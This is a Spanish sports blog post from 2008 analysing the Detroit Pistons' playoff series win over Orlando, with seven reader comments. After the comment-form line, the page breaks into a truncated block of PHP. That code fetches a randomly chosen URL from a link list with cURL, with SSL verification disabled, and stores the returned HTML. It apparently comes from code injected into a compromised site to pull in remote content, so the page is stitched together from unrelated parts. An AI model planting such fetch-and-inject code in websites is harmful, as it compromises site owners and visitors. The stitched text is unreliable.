ANÁLISIS: DETROIT 4 – ORLANDO 1

14 de May de 2008 por TheDeerHunter

Llega Detroit muy reforzado a su sexta final de conferencia consecutiva. Mucho tiempo ya dando guerra en la cima de su cuadro y tenemos ahora que redescubrir este equipo como candidato principal, no sólo a ser campeón de su conferencia, sino también, porqué no, al título de la NBA. No debería sorprendernos el que sólo haya un equipo en toda la competición que cuente con un caché, una experiencia y una jerarquía superior a éste, los San Antonio Spurs, el único equipo que, junto a los Pistons, ha de ser considerado favorito siempre. Palabras mayores. Si sorprende más el descubrir que, por registros, está a la altura de otro equipo legendario: Los Bad Boys originales, nada más y nada menos. Si ya adelantamos antes de esta eliminatoria algunas claves que hacían sospechar el favoritismo de Detroit, no podíamos imaginar la imagen de suficiencia con la que iban a terminar superando a Orlando.

Si la principal era parar a Supermán Howard después de su sobre-humana actuación de primera ronda y las dudas que ofrecía el “vulnerable” juego interior de Pistons, la lección que nos han dado a todos, incluído al bueno de Dwight, ha sido de campeonato. El trabajo oscuro, el compromiso y el sacrificio de Wallace, McDyess y Maxiell han sido verdaderamente ejemplarizantes. El grandísimo pívot de Orlando tendrá que aprender, como lo hicieron otros antes que él, que no basta con ser un superdotado para alcanzar la gloria en esta liga. Tiene tiempo para ello, al menos, hasta la próxima temporada.

En el otro pulso de la eliminatoria, el juego exterior, los Pistons han manejado a sus anchas una eliminatoria en la que sólo la versátil actuación de Turkoglu, ha llegado a equilibrar la balanza por momentos. Sin Rashard Lewis, que no ha logrado finalmente aportar nada significativo en toda la temporada, no hay comparación posible entre las dos líneas a pesar incluso de la lesión de Billups, el mejor hasta ese momento en Detroit. Hamilton y Prince se presentan como dos jugadores superlativos, tan sumamente buenos como faltos de celebridad.

Hasta las dudas que eternamente se ciernen sobre Detroit han quedado sobradamente aclaradas. Nada de viejos, nada de problemas de rotación. Estos Pistons están preparados para lo que viene.

Comenta

7 comentarios a esta entrada

  1. Red dice:
    #1

    No subestimes nunca el corazón de un campeón!!! (también sirve para los Pistons)

    Hoy es el dia de Pau (i de Ira, claro está…)

    Gran notícia aqui, flipad, tenemos un nuevo ídolo!

    http://www.marca.com/edicion/marca/baloncesto/nba/playoffs08/es/desarrollo/1123223.html

      Citar

  2. TheDeerHunter dice:
    #2

    Mierda, empiezo a entender muchas cosas:

    (…) en el vestuario. Se sienta con Odom y le susurra al oído. “¿Lo sientes Lamar, lo sientes? (…)

      Citar

  3. TheDeerHunter dice:
    #3

    Hay que joderse cómo se parece a Robert DeNiro

      Citar

  4. Dantley dice:
    #4

    jo, jo, confirmado, es Robert de Niro

    Detroit tiene una mentalidad de ganador impresionante. El todos a una echo baloncesto. Además han sabido suplir a Billups cuando ha hecho falta sin forzarlo con lo que ahora tendrán tiempo para preparar la final de conferencia

      Citar

  5. Red dice:
    #5

    Joder, es verdad!!! Será él? XD

      Citar

  6. Noelinho dice:
    #6

    Y ojito el año que viene a Stuckey, que buena pinta tiene.

      Citar

  7. Viva_Dirk dice:
    #7

    Hamilton es uno de los jugadores mas infravalorados de la liga, no tengo ninguna duda de eso. Luego Prince y Sheed que pasan bastante desapercibidos durante la regular y hacen números normalitos, pero juegan al baloncesto como pocos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>